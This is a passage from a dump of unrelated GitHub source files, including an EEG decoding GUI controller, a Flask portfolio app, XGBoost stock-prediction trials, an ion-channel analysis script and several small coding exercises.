ChannelWidget()\n # self.init_bad_channel()\n self.data_length = 100\n self.sub_plots = []\n self._filter_channel_widget = None\n bind_cpu(0x0001)\n\n def init_bad_channel(self):\n self._filter_channel_widget = ChannelWidget()\n bad_chs = [\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,\n 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29,\n 30, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44,\n 46, 47, 48, 49, 50, 51, 52, 54, 55, 56, 57, 58, 60, 61,\n 62, 64, 65, 66, 68, 73, 74, 76, 81, 82, 83, 84, 86, 87,\n 88, 89, 90, 91, 94, 96, 97, 98, 99, 100, 101, 102, 103, 104,\n 105, 106, 107, 108, 109, 110, 112, 113, 114, 115, 116, 117, 118, 119,\n 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 132, 133, 134,\n 135, 136, 137, 138, 140, 141, 143, 145, 146, 149, 150, 151, 152, 153,\n 154, 156, 158, 159, 161, 162, 166, 168, 169, 170, 172, 173, 174, 175,\n 176, 177, 178, 179, 180, 181, 185, 186, 187, 193, 194, 195, 196, 198,\n 201, 202, 203, 204, 205, 207, 209, 210, 211, 212, 214, 216, 217, 218,\n 219, 220, 222, 
223, 224, 225, 226, 227, 229, 231, 232, 233, 234, 236,\n 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250,\n 251, 252, 253, 254, 255, 256\n ]\n bad_chs = [_ - 1 for _ in bad_chs]\n self._filter_channel_widget.set_bad_channels(bad_chs)\n\n def get_eeg_impedances(self):\n try:\n host = \"127.0.0.1:10800\"\n host = os.environ.get(\"ME_HOST\", host)\n loguru.logger.debug(f\"http://{host}/api/v1/board/impedances?refresh=false\")\n r = requests.get(f\"http://{host}/api/v1/board/impedances?refresh=false\", timeout=1.0)\n return r.json()['data']\n except Exception as e:\n loguru.logger.exception(e)\n return {}\n\n def console_log(self, text, level: int=0):\n if level > 4: level = 4\n if level < 0: level = 0\n color = {\n 0: '#999999', # trace\n 1: '#666666', # debug\n 2: 'green', # info\n 3: '#FFCC00', # warn\n 4: 'red' # error\n }\n html = f\"- <span style='color: {color[level]}'>{text}</span>\"\n if level >= self.log_level:\n self.win.logBrowser.append(html)\n my_cursor = self.win.logBrowser.textCursor()\n self.win.logBrowser.moveCursor(my_cursor.End)\n\n def set_ui(self, ui):\n self.win = ui\n self.init_bad_channel()\n\n def init_subplot(self):\n # self.win.plotWidget.addLegend()\n for i, each in enumerate(self._plots):\n sub_plot = self.win.plotWidget.addPlot(row=i, col=0, title=f\"{each}\")\n sub_plot.addLegend()\n timeline = [i for i in range(self.data_length)]\n sub_plot.setLabel(\"left\", \"运动幅度/m\")\n sub_plot.setLabel(\"bottom\", \"时间\")\n if i == 0:\n sub_plot.setYRange(min=-2, # 最小值\n max=2) # 最大值\n else:\n sub_plot.setYRange(min=-0.2, # 最小值\n max=0.2) # 最大值\n plot_curves = {}\n self.sub_plots.append({\n 'sub_plot': sub_plot,\n 'timeline': timeline,\n 'plot_curves': plot_curves\n })\n\n def clear_plot(self):\n for subplot in self.sub_plots:\n subplot['timeline'] = [i for i in range(self.data_length)]\n plot_curves = subplot['plot_curves']\n for tag,v in plot_curves.items():\n curve, data = v\n for i in range(len(data)):\n data[i] = 0\n curve.setData(subplot['timeline'], data)\n\n def init_graph(self):\n if not self.sub_plots:\n self.init_subplot()\n\n selected_devices = ['pred', 'real']\n\n for j, subplot in enumerate(self.sub_plots):\n sub_plot = subplot['sub_plot']\n plot_curves = subplot['plot_curves']\n for i, tag in enumerate(selected_devices):\n curve = sub_plot.plot(\n pen=pg.mkPen(self.colors[i], width=2), name=tag\n )\n\n plot_curves[tag] = curve, [0 for i in range(self.data_length)]\n else:\n self.clear_plot()\n\n\n\n def __update_data(self, data_array, num, timeline, curve):\n data_array.append(num)\n data_array.pop(0)\n curve.setData(timeline, data_array)\n\n def update_data(self, data:dict):\n # loguru.logger.debug(data)\n # self.console_log(f\"{data}\", level=2)\n timeline = self.sub_plots[0]['timeline']\n\n curve_speed_pred, data_speed_pred = self.sub_plots[0]['plot_curves']['pred']\n self.__update_data(data_speed_pred, data['pred'][0][0], timeline, curve_speed_pred)\n\n curve_pos_pred, data_pos_pred = self.sub_plots[1]['plot_curves']['pred']\n self.__update_data(data_pos_pred, data['pred'][0][1], timeline, curve_pos_pred)\n\n curve_speed_real, data_speed_real = self.sub_plots[0]['plot_curves']['real']\n self.__update_data(data_speed_real, data['motion'][0], timeline, curve_speed_real)\n\n curve_pos_real, data_pos_real = self.sub_plots[1]['plot_curves']['real']\n self.__update_data(data_pos_real, data['motion'][1], timeline, curve_pos_real)\n\n v_c = np.corrcoef(data_speed_pred, data_speed_real)\n p_c = np.corrcoef(data_pos_pred, data_pos_real)\n msg 
= f\"cc=v={v_c[0][1]} p={p_c[0][1]} real={data['motion']}\"\n self.console_log(msg, level=2)\n\n def start(self):\n if self._decoding is False:\n try:\n self.console_log(f\"开始解码\", 2)\n self.win.starDecode.setDisabled(True)\n self.decode()\n self.win.starDecode.setText(\"停止解码\")\n self.win.starDecode.setDisabled(False)\n self._decoding = True\n except Exception as e:\n self.console_log(f\"启动解码失败:{e}\", 4)\n loguru.logger.exception(e)\n self._decoding = False\n self.win.starDecode.setDisabled(False)\n self.win.starDecode.setText(\"解码\")\n else:\n self.console_log(f\"停止解码\", 2)\n self._decode.stop_decode()\n self._decoding = False\n self.win.starDecode.setText(\"解码\")\n\n def msg_pull(self, *args):\n self.console_log(f\"{args}\", level=3)\n\n def decode(self):\n # neural_fs = 4000\n # bad_chs = [\n # 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,\n # 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29,\n # 30, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44,\n # 46, 47, 48, 49, 50, 51, 52, 54, 55, 56, 57, 58, 60, 61,\n # 62, 64, 65, 66, 68, 73, 74, 76, 81, 82, 83, 84, 86, 87,\n # 88, 89, 90, 91, 94, 96, 97, 98, 99, 100, 101, 102, 103, 104,\n # 105, 106, 107, 108, 109, 110, 112, 113, 114, 115, 116, 117, 118, 119,\n # 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 132, 133, 134,\n # 135, 136, 137, 138, 140, 141, 143, 145, 146, 149, 150, 151, 152, 153,\n # 154, 156, 158, 159, 161, 162, 166, 168, 169, 170, 172, 173, 174, 175,\n # 176, 177, 178, 179, 180, 181, 185, 186, 187, 193, 194, 195, 196, 198,\n # 201, 202, 203, 204, 205, 207, 209, 210, 211, 212, 214, 216, 217, 218,\n # 219, 220, 222, 223, 224, 225, 226, 227, 229, 231, 232, 233, 234, 236,\n # 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250,\n # 251, 252, 253, 254, 255, 256\n # ]\n # bad_chs = [_ - 1 for _ in bad_chs]\n bad_chs = self._filter_channel_widget.get_bad_channels()\n neural_fbands = self.win.neuralFbands.toPlainText()\n neural_fbands = [F.strip().split('-') for F in neural_fbands.split('\\n') if F.strip() ]\n loguru.logger.debug(neural_fbands)\n neuro_setting = NeuroSetting(\n neuro_bad_channels=bad_chs,\n neural_fbands=neural_fbands,\n )\n behavior_input_filter = self.win.behaviorInpFilter.currentText()\n behavior_target_type = self.win.behavioTargetType.currentText().split('-')\n behavior = BehaviorSetting(\n behavior_target_type=behavior_target_type,\n behavior_input_filter=behavior_input_filter if behavior_input_filter != 'none' else None\n )\n config = DecoderSetting(neuro=neuro_setting,\n bin_size=self.win.binSizeDoubleSpinBox.value(),\n behavior=behavior,\n nbins_train=self.win.nbinsTrainSpinBox_2.value(),\n ncomponents=self.win.ncomponentsSpinBox.value()\n )\n dog_setting = DogWalkDecodeSetting(motion_field=self.win.behaviorField.currentText())\n self._decode = DogWalkDecoderService(config, dog_setting=dog_setting)\n self._decode.message_push_trigger.connect(self.update_data)\n self._decode.err_push_trigger.connect(self.msg_pull)\n async_qt.async_run(self._decode.decode(), errcall=self.connect_err_callback)\n self.init_graph()\n\n def connect_err_callback(self, e):\n loguru.logger.debug(traceback.format_exc())\n self.console_log(e, 4)\n\n def filter_channel(self):\n loguru.logger.info(\"filter channel\")\n self._filter_channel_widget.show()\n\n\n\ndecoder_service = DecoderService()\n\n\nclass DecoderController:\n def __init__(self, ui:Ui_MainWindow, loop=None):\n self.ui:Ui_MainWindow = ui\n self.loop = loop\n self.init()\n\n def init(self):\n self.ui.plotWidget.setBackground('w')\n 
decoder_service.set_ui(self.ui)\n self.ui.starDecode.clicked.connect(decoder_service.start)\n self.ui.filterChannel.clicked.connect(decoder_service.filter_channel)\n\n","repo_name":"YunDid/NeuroXess","sub_path":"mind-explorer-plugin/app/controller/decoder_controller.py","file_name":"decoder_controller.py","file_ext":"py","file_size_in_byte":11230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15219508479","text":"# John wants lose 10 pounds in one month. \n# There are multiple conditions to lose 10 pounds in a month \n# John needs to walk 10000 steps daily OR needs to run at least\n# 4 miles a day. and Addition to these , John needs to eat less \n# than 1500 calories daily. We should create a program to calculate \n# if John can loose weight or not \n# daily steps,running distance and daily calory intake will be given by users.\n#Our goal is to print True when John can loose weight and print False otherwise.\n\nsteps=int(input(\"How many steps do you walk dayly?\"))\nmilesRun=int(input(\"How many miles do you run daily?\"))\ncalories=int(input(\"How many calories do you eat daily?\"))\ngoal=steps>=1000 or milesRun>=10 and calories<=1500\nprint(goal)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"zhannakarayeva/devops","sub_path":"Python/BooleanType/bool_ex7.py","file_name":"bool_ex7.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37768401024","text":"from flask import (render_template, redirect, \n url_for, request)\nfrom models import db, Project, app\nfrom completed_projects import PROJECTS\nfrom datetime import datetime\n\n\ndef insert_project_data():\n for project in PROJECTS:\n project_in_db = (Project.query.filter\n (Project.title==project['title']).one_or_none())\n if project_in_db == None:\n id = project['id']\n title = project['title']\n date = datetime.strptime(project['date'],'%B %Y').date()\n description = project['description']\n skills = project['skills']\n url = project['url']\n new_project = Project(id=id, title=title, date=date, \n description=description, \n skills=skills, url=url)\n db.session.add(new_project)\n db.session.commit()\n \n\n@app.route('/')\ndef index():\n projects = Project.query.all()\n return render_template('index.html', projects=projects)\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n\n@app.route('/project/new', methods=['GET', 'POST'])\ndef add_project():\n projects = Project.query.all()\n if request.form:\n new_project = Project(title=request.form['title'], \n date=datetime.strptime(request.form['date'], '%Y-%m').date(),\n description=request.form['desc'], \n skills=request.form['skills'], \n url=request.form['github'])\n db.session.add(new_project)\n db.session.commit()\n return redirect(url_for('index'))\n return render_template('projectform.html', projects=projects)\n\n\n@app.route('/project/<id>')\ndef detail(id):\n projects = Project.query.all()\n project = Project.query.get_or_404(id)\n return render_template('detail.html', project=project, \n projects=projects)\n\n\n@app.route('/project/<id>/edit', methods=['GET', 'POST'])\ndef edit_project(id):\n project = Project.query.get_or_404(id)\n if request.form:\n project.title=request.form['title']\n project.date=datetime.strptime(request.form['date'], '%Y-%m').date()\n project.description=request.form['desc'] \n project.skills=request.form['skills'] \n project.url=request.form['github']\n 
db.session.commit()\n return redirect(url_for('detail', id=id))\n return render_template('edit_project.html', project=project)\n\n\n@app.route('/project/<id>/delete')\ndef delete_project(id):\n project = Project.query.get_or_404(id)\n db.session.delete(project)\n db.session.commit()\n return redirect(url_for('index', project=project))\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return render_template('404.html', msg=error), 404\n\n\nif __name__ == '__main__':\n with app.app_context():\n db.create_all()\n insert_project_data()\n app.run(debug=True, port=8000, host='0.0.0.0')\n \n \n ","repo_name":"chelsearumsey/Project-5---Portfolio-with-SQLAlchemy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73965627784","text":"import sys\nsys.path.append('../')\nimport numpy as np\nimport tensorflow as tf\n\nimport hparam as conf\nimport sessionWrapper as sesswrapper\nfrom utility import dataProcess as dp\nfrom utility import general_utility as gu\nimport model_zoo as mz\nimport loss_func as l\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import preprocessing\nimport trial_xgboost_ensCls as ens\nimport xgboost as xgb\nfrom sklearn.metrics import accuracy_score\nfrom utility_trial import *\n\nsrcPath = '/home/ubuntu/dataset/etf_prediction/all_feature_data_Nm_1_MinMax_94.pkl'\ntv_gen = dp.train_validation_generaotr()\n*_,meta = gu.read_metafile('/home/ubuntu/dataset/etf_prediction/all_meta_data_Nm_1_MinMax_94.pkl')\nf = tv_gen._load_data(srcPath)\n\ndp_ = dp.data_processor(srcPath)\n\n#stock_list = ['0050', '0051', '0052', '0053', '0054', '0055', '0056', '0057', '0058', '0059', '006201', \n# '006203', '006204', '006208','00690', '00692', '00701', '00713']\n\nstock_list = ['0050']\nperiod = None\ndf = pd.DataFrame({'date':f.columns})\ndf['date'] = pd.to_datetime(df['date'])\ndf['dow'] = df['date'].dt.dayofweek\n\n#********Get Monday data*********\n\n\n#for s in stock_list:\n#\n# single_stock = tv_gen._selectData2array(f, [s], period)\n# dow_array = np.array(df['dow'][-len(single_stock):])\n# dow_array_mask = np.equal(dow_array, 2)\n# monday_stock = single_stock[dow_array_mask]\n# \n# data = monday_stock[:-1]\n# label = np.argmax(monday_stock[1:, -3:], axis=-1)\n# \n# fe = feature_extractor(meta, data)\n# ud, _ = fe.ratio()\n# data_feature = ud\n# train_val_set = dp_.split_train_val_set(data_feature, label, 0.1)\n# \n# train_data = train_val_set['train']\n# test_data = train_val_set['test']\n# train_label = train_val_set['train_label']\n# test_label = train_val_set['test_label']\n# \n# model = xgb.XGBClassifier(max_depth=3, learning_rate=0.05 ,n_estimators=500, silent=False)\n# model.fit(train_data, train_label)\n# y_xgb_train = model.predict(train_data)\n# y_xgb_valid = model.predict(test_data)\n# \n# print(\"Train Accuracy [ratio]: \", accuracy_score(y_xgb_train, train_label))\n# print(\"Validation Accuracy [ratio]: \",accuracy_score(y_xgb_valid, test_label))\n# \n \n#********Combine two days data*********\n \n\n\n\ndef get_data_from_dow(stocks, meta, lagfday, feature_list = ['ratio']):\n \n df = pd.DataFrame({'date':f.columns})\n df['date'] = pd.to_datetime(df['date'])\n df['dow'] = df['date'].dt.dayofweek\n dow_array = np.array(df['dow'][-len(single_stock):])\n dow_array_mask_mon = np.equal(dow_array, lagfday)\n \n def get_mask(dow_array_mask_mon):\n for i in range(5):\n dow_array_mask_mon[i] = False\n \n 
dow_array_mask = [dow_array_mask_mon]\n for j in range(1, 5):\n tmp_mask = np.zeros(np.shape(dow_array_mask_mon), np.bool)\n for i in range(1, len(dow_array_mask_mon)):\n if dow_array_mask_mon[i] == True: \n tmp_mask[i-j] = True \n else: \n tmp_mask[i] = False\n dow_array_mask.append(tmp_mask)\n return dow_array_mask\n\n dow_array_mask = get_mask(dow_array_mask_mon)\n \n \n dow = {0:'mon', 1:'tue', 2:'wed', 3:'thu', 4:'fri'}\n features = {}\n \n for d in range(5):\n features[dow[d]] = {}\n shifted_stock = stocks[dow_array_mask[d]]\n shifted_stock = shifted_stock[:-1]\n \n fe = feature_extractor(meta, shifted_stock)\n \n for feature_name in feature_list:\n features[dow[d]][feature_name], _ = getattr(fe, feature_name)()\n \n label = np.argmax(stocks[dow_array_mask[0]][1:, -3:], axis=-1)\n \n return features, label\n\nstock_list = ['0050', '0051', '0052', '0053', '0054', '0055', '0056', '0057', '0058', '0059', '006201', \n '006203', '006204', '006208','00690', '00692', '00701', '00713']\n\n\nbest_config = {}\npredict_days = list(range(5))\nconsider_lagdays = list(range(1,6))\nfeature_list_comb = [['ratio'],\n ['rsi'],\n ['kdj'],\n ['macd'],\n ['ud']]\n\nfor s in stock_list:\n best_config[s] = {}\n for predict_day in predict_days:\n best_config[s][predict_day] = {}\n best_accuracy = 0\n for consider_lagday in consider_lagdays:\n for feature_list in feature_list_comb:\n \n \n single_stock = tv_gen._selectData2array(f, [s], period)\n features, label = get_data_from_dow(single_stock, meta, predict_day, feature_list)\n \n feature_concat = []\n dow = {0:'mon', 1:'tue', 2:'wed', 3:'thu', 4:'fri'}\n \n for i in range(consider_lagday):\n for k in features[dow[i]]:\n feature_concat.append( features[dow[i]][k])\n \n \n data_feature = np.concatenate(feature_concat, axis=1)\n \n train_val_set_days = dp_.split_train_val_set(data_feature, label, 0.1)\n \n \n train_data = train_val_set_days['train']\n test_data = train_val_set_days['test']\n train_label = train_val_set_days['train_label']\n test_label = train_val_set_days['test_label']\n \n model = xgb.XGBClassifier(max_depth=3, learning_rate=0.05 ,n_estimators=500, silent=False)\n model.fit(train_data, train_label)\n y_xgb_train = model.predict(train_data)\n y_xgb_valid = model.predict(test_data)\n \n print(\"Train Accuracy [ratio]: \", accuracy_score(y_xgb_train, train_label))\n print(\"Validation Accuracy [ratio]: \",accuracy_score(y_xgb_valid, test_label))\n \n if accuracy_score(y_xgb_valid, test_label) > best_accuracy:\n best_config[s][predict_day] = {'train acc': accuracy_score(y_xgb_train, train_label),\n 'test_acc': accuracy_score(y_xgb_valid, test_label),\n 'days': consider_lagday,\n 'features': feature_list}\n best_accuracy = accuracy_score(y_xgb_valid, test_label)\n \n \n \n \n\n \n \n \n\n","repo_name":"dashmoment/etf_prediction","sub_path":"trial/trial_split_by_dow.py","file_name":"trial_split_by_dow.py","file_ext":"py","file_size_in_byte":6457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70788915466","text":"from collections import Counter\n\n\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n\n combo_sums = []\n\n n = len(candidates)\n\n def _dfs(combo=[], combo_sum=0, idx=0):\n\n if combo_sum > target: return\n\n if combo_sum == target: combo_sums.append(combo); return\n\n # iterate through all potential answers\n for i in range(idx, n):\n _dfs(combo + [candidates[i]], combo_sum + candidates[i], i)\n\n _dfs()\n\n return 
combo_sums\n\n\n","repo_name":"Drblessing/leetcode","sub_path":"Combination Sum.py","file_name":"Combination Sum.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70953006025","text":"from setuptools import setup, find_packages\n\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\nsetup(name='bx24_orm',\n version='0.0.2',\n description='Easy to use Django-styled API wrapper for Bitrix 24',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/dmitriilazukov/bx24_orm',\n author='Dmitrii Lazukov',\n author_email='dmitriilazukov@gmail.com',\n license='MIT',\n packages=find_packages(where='.', exclude='bx24_settings'),\n entry_points={\n 'console_scripts': ['bx24_cmd=bx24_orm.scripts.command_line:bx24_cmd'],\n },\n install_requires=[\n 'requests',\n 'six',\n 'python-dateutil'\n ],\n classifiers=[\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n ],\n zip_safe=False)\n","repo_name":"dmitriilazukov/bx24_orm","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"11344227051","text":"# https://www.acmicpc.net/problem/16916\n# 부분 문자열 구하기 _ Rabin-Karp Algorithm\n# 836ms\ndef h(s):\n num = 0\n for c in s:\n num = (num * base + ord(c)) % mod\n return num\n\n\ndef match(s, p):\n n, m = len(s), len(p)\n if n<m:\n return 0\n first = 1\n for i in range(m-1):\n first = (first * base) % mod\n hash_p = h(p)\n hash_s = h(s[0:0 + m])\n for i in range(n - m+1):\n\n if hash_p == hash_s:\n return 1\n if i+m<n:\n hash_s = hash_s - (ord(s[i])*first)%mod\n hash_s = (hash_s+mod)%mod\n hash_s = ((hash_s*base)%mod+ord(s[i+m]))%mod\n\n return 0\n\nimport sys\nmod = 2147483647\nbase = 256\ns = sys.stdin.readline().strip() # strip 을 안해주면 whitespace가 들어감\np = sys.stdin.readline().strip()\nprint(match(s, p))\n","repo_name":"MinMolang/codePractice","sub_path":"BOJ/BOJ16916(라빈카프).py","file_name":"BOJ16916(라빈카프).py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24713099426","text":"def solution(record):\n answer = []\n nickname_dict = {}\n\n ENTER_KEY = \"Enter\"\n LEAVE_KEY = \"Leave\"\n CHANGE_KEY = \"Change\"\n\n for desc in record:\n if CHANGE_KEY in desc or ENTER_KEY in desc:\n _, uid, nickname = desc.split(\" \")\n nickname_dict[uid] = nickname\n\n for desc in record:\n if ENTER_KEY in desc:\n _, uid, nickname = desc.split(\" \")\n answer.append(nickname_dict[uid] + \"님이 들어왔습니다.\")\n\n if LEAVE_KEY in desc:\n _, uid = desc.split(\" \")\n answer.append(nickname_dict[uid] + \"님이 나갔습니다.\")\n\n return answer\n","repo_name":"sojinjang/algorithm","sub_path":"programmers/Lv.2/kakao/오픈채팅방.py","file_name":"오픈채팅방.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7805701521","text":"import csv\r\nimport matplotlib.pyplot as plt\r\n\r\nf = open('c:/temp/weather.csv')\r\ndata = csv.reader(f)\r\nheader = next(data) # 헤더제거\r\n\r\nmonthly_wind = list(range(12))\r\ndays_counted = [x for x in range(12)]\r\n\r\nfor row in data:\r\n month = int(row[0][5:7]) # 일시에서 월 데이터만 추출 2010-\"08\"-01\r\n if 
row[3] != '': # 공백이 아니면 바람이 붐\r\n wind = float(row[3]) # wind에 최대풍속값 담기\r\n monthly_wind[month-1] += wind # 월에 해당아는 인덱스에 풍속값 더하기 -> 누적되는 수\r\n days_counted[month-1] += 1 # 월에 분 풍속 일수를 세기 위한 변수\r\n\r\n\r\nfor i in range(12):\r\n monthly_wind[i] /= days_counted[i] # 총 풍속값을 바람이 분 날짜 일수로 나누어서 평균 확인\r\n\r\nplt.plot(monthly_wind, 'blue')\r\nplt.show()\r\n\r\nf.close()","repo_name":"zxxng/Python-MySQL","sub_path":"12주차_pandas_실습코드/data/실습I.py","file_name":"실습I.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9031184826","text":"\r\nimport requests\r\n\r\n#Forms an asynch request to download an html file\r\n# containing the card data.\r\n\r\nurl = \"https://gwent.one/search/ajax\"\r\n\r\nheaders={ \r\n\t'content-type':'application/x-www-form-urlencoded; charset=UTF-8',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:27.0) Gecko/20100101 Firefox/27.0',\r\n }\r\n\t\r\n\t\r\ndata = {\r\n\t'v' : '8.0.0',\r\n\t'total' : '998',\r\n\t'lang' : 'en',\r\n\t'page' : '1'\r\n}\r\n\r\nreq = requests.post(url, data=data, headers=headers);\r\n\r\nwith open(\"cardsHtml.html\", \"w\", encoding=\"utf-8\") as outHtml:\r\n\toutHtml.write(req.text);\r\n","repo_name":"ATaylorEmmons/Card-Analytics","sub_path":"Gwent/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17522395961","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 10 16:16:08 2020\n\n@author: francesco\n\"\"\"\nimport Hidden_Marcov_chain as MC1\nimport lgbm_functions as LF\nimport MultiGaussianModel as MGM\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nfont = {'family' : 'normal',\n 'weight' : 'normal',\n 'size' : 40}\n\nmatplotlib.rc('font', **font)\nmatplotlib.rcParams['figure.figsize'] = (24, 20)\n\n\n\npath = '/home/francesco/Machine_learning/PyTorch/liverpool-ion-switching'\nos.chdir(path)\n\ntest = pd.read_csv('train.csv')\n\n\n\ntime = test['time'].values \nsignal = test['signal'].values\n\n\n\n# %%\n\n\ni_blocks = [int(i*1e+5) for i in range(1, 11)] + [ int(1.5e+6), int(2.0e+6) ] \n\n\nclean_signal, i0 = np.array([]), 0\n\nfor i1 in i_blocks:\n clean_signal_ = MGM.remove_drift(s=signal[i0:i1], t=time[i0:i1])\n clean_signal = np.append(clean_signal, clean_signal_)\n i0 = i1\n\n\n# %% plot test data\n\n\n#fig, (ax1) = plt.subplots(1, 1, sharex=True, figsize=(8, 8))\n#ax1.plot(time, clean_signal, marker='.', lw=0, markersize=0.02, color='black')\n\n\n\n# %%\n\nblocks, i0 = [], 0 \nfor i1 in i_blocks:\n #\n blocks += [MGM.SingleBlock(signal = clean_signal[i0:i1], time = time[i0:i1] )] \n i0 = i1 \n \n \n\n# %%\n\n\nfor i, B in enumerate(blocks):\n # # # \n MGM.fit_single_block_with_MGM(single_block=B, plot=True, f=[0.4, 0.9])\n \n\n\n\n# %% Predict Using Markov Chain\n \n \nall_pred = np.array([])\nt_out = np.array([]) \n\nfor i, B in enumerate(blocks):\n logQ = B.s\n y_true = B.c\n \n \n params = {'n_components' : len(B.predicted_channels),\n 'means_' : B.MultiNormalFit[:,1],\n 'covars_' : B.MultiNormalFit[:,2].mean()**2,\n }\n \n my_model = MC.fitHMM(Q=logQ, parameters=params)\n \n y_pred = MC.prediction_GaussianHMM(X=logQ, real_values=B.predicted_channels, \n model=my_model)\n\n all_pred = np.append(all_pred, y_pred) \n t_out = np.append(t_out, B.t) \n \n 
print()\n\n\n\n# %% Predict Using Markov Chain1\n \n \nall_pred = np.array([])\nt_out = np.array([]) \n\nfor i, B in enumerate(blocks):\n logQ = B.s\n y_true = B.c\n\n\n mus = B.MultiNormalFit[:,1]\n sig = B.MultiNormalFit[:,2].mean() \n \n my_model = MC1.fit_HMM_Normal(Q=logQ, mus=mus, sig=sig)\n \n y_pred = MC1.prediction_HMM_Normal(X=logQ, real_values=B.predicted_channels, \n model=my_model)\n\n all_pred = np.append(all_pred, y_pred) \n t_out = np.append(t_out, B.t) \n\n \n\n\n# %%\nprint(all_pred.shape) \nprint(t_out.shape)\n\n# %%\n\n\nfor i, B in enumerate(blocks): \n MGM.infer_block_type(B=B) \n print(i, B.block_type) \n\n\n\n\n\n# %%\ny_pred = np.array([])\nt_out = np.array([]) \nfor B in blocks:\n y_pred_, _ = LF.prediction_multi_models([B])\n y_pred = np.append(y_pred, y_pred_)\n t_out = np.append(t_out, B.t) \n \n \n# %% \n \nsub = pd.DataFrame({'time': t_out, 'open_channels': all_pred.astype(np.int)})\n\nsub.to_csv('sub1.csv', float_format='%0.4f', index=False) \n \n \n\n\n ","repo_name":"FrancescopR/Ion_switching","sub_path":"tests/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41728871882","text":"import pandas as pd\n\n\ndef decode_labels(label_file, attributes):\n \"\"\" from [0 1 0 0 ..] to 'wheel' \"\"\"\n labels = pd.read_csv(label_file, delimiter=' ', index_col=0, header=None)\n labels_encoded = []\n fnames = []\n for f, row in labels.iterrows():\n fnames.append(f)\n labels_encoded.append(attributes[row.idxmax() - 1])\n return fnames, labels_encoded","repo_name":"nadezola/AttributeClassification","sub_path":"lib/decode_labels.py","file_name":"decode_labels.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74576281863","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n##########################################################################\n#\t> File Name: data-handle.py\n#\t> Author: Tingjian Lau\n#\t> Mail: tjliu@mail.ustc.edu.cn\n#\t> Created Time: 2016/09/29\n#\t> Detail: \n#########################################################################\n\nimport numpy as np\nimport theano\nimport theano.tensor as T\n\nclass DataHandle(object):\n def __init__(self, seq_length=10, row_interval=[1, 5], axes=[0, 0],\n delimiter='\\t', del_table_header=True):\n self._row_start = row_interval[0]\n self._row_end = row_interval[1]\n self._seq_length = seq_length\n self._axis1=axes[0]\n self._axis2=axes[1]\n self._delimiter=delimiter\n self._del_table_header=del_table_header\n\n '''\n def load_data(self, data_path):\n params:\n ------\n seq_length: 将seq_length条数据拼接成一条\n axis1,axis2: 通过比较第seq_length个样本的第aixs2维的值与\n 第seq_length+1个样本的第axis1的值得到类号\n del_table_header: 是否删除第一行,即表头\n delimiter: 数据的分隔符\n return: 拼接好之后的数据集和类号\n\n print(\"Loading data from {} ...\".format(data_path))\n data = open(data_path, 'r')\n data_set_x = []\n for line in data:\n data_set_x.append(line.split('\\n')[0].split(self._delimiter)[self._row_start:self._row_end])\n data.close()\n if self._del_table_header:\n data_set_x = data_set_x[1::]\n\n data_set_y = []\n new_len = len(data_set_x)-self._seq_length\n for i in range(new_len):\n if data_set_x[i+self._seq_length-1][self._axis1] > data_set_x[i+self._seq_length][self._axis2]:\n data_set_y.append(0)\n else:\n data_set_y.append(1)\n\n for j in range(self._seq_length-1):\n data_set_x[i].extend(data_set_x[i+j+1])\n\n 
